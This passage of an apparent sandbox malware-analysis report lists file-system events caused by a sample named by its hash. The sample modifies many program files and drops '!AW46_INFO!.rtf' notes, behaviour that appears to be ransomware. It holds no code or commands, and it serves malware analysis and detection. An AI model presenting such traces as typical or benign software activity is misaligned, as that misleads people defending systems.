Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Vancouver 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tirane 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Knox 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.security 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-search.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\te.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EET 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mexico_City 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunmscapi.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.LIC 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Rarotonga 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Chita 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Mail\wab.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Panama 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterRegular.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Casablanca 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Irkutsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Monterrey 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santarem 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Omsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hong_Kong 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\psfont.properties.ja 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Creston 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Maceio 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Luxembourg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Monaco 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DVA.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ct.sym 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dili 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Accra 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Taipei 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-uisupport.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-10 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\file_obj.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5EDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Detroit 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\ReadConvert.js 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtobe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Luis 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands_3.6.100.v20140528-1422.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\local_policy.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\browser\features\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rio_Branco 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\New_Salem 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Prague 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\manifest.json 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vincennes 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cuiaba 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Mawson 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\83.0.4103.106.manifest 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baghdad 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\CompareNew.pcx 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\resources.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST5EDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\COPYRIGHT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt 